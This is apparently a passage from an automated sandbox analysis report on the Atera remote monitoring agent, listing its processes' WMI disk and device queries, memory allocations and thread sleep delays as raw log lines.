                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : associators of {\\user-PC\root\CIMV2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_SoundDevice
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 1779DE20000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 177B77A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 21C42070000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 21C5A750000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2156BBE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 2156C560000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 15E7D2A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 15E7D840000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 24740A20000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 24759010000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 2162FF80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMemory allocated: 216484E0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 281BDB60000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeMemory allocated: 281D61D0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 2EF73FE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMemory allocated: 2EF74460000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 1F71CC20000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 1F735420000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 2203A0F0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 22052770000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeMemory allocated: 214718E0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeMemory allocated: 21471D80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 18457BE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeMemory allocated: 1846FE90000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMemory allocated: 22B825A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeMemory allocated: 22B9A680000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMemory allocated: 153FCF80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeMemory allocated: 153FD520000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeMemory allocated: 25FBF6C0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeMemory allocated: 25FD7AE0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 29E214A0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeMemory allocated: 29E39CC0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599891
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599754
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599625
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599498
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599389
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 599022
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 598797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 598687
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 598578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 598469
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 598359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 598250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 598141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 598031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 597921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 597812
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 597703
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 597594
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 597485
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 597375
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 597256
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 597135
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 597031
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 596911
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 596782
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 596612
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 596360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 599879
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 599756
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 599610
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 599490
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 599360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 599250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 599136
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 599016
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 598906
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 598789
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 598672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 598563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 598453
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 598340
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 598216
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 598107
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 597985
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 597860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 597735
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 597610
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 597468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 597359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 597244
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 597130
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 597000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 596890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 596781
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 596672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 596563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 596449
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 596328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 596215
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 596098
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 595969
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 595860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 595747
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 595637
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 595464
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 595356
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 595225
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 595106
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 594993
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 594875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 594764
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 594641
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 594531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 594419
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 594297
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 594188
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 594075
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 593953
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 593844
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Thread delayed: delay time: 593732
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 599812
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 599685
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 599574
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 599468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 599359
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 599249
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 599140
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 599011
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 598882
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 598731
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 598624
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 598504
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 598390
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 598281
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 598138
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 598015
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 597848
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 597734
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 597621
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 597515
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 597403
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 597294
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 597187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 597075
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 596960
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 596852
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 596745
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 596627
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 596513
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 596404
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 596296
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 596187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 596067
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 595909
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 595672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 595530
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 595380
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 595265
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 595156
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 595046
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 594934
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 594797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 594668
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 594531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 594360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 594165
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 593984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 593843
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 593719
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 593578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 593451
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 593334
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 593206
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 593077
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 592959
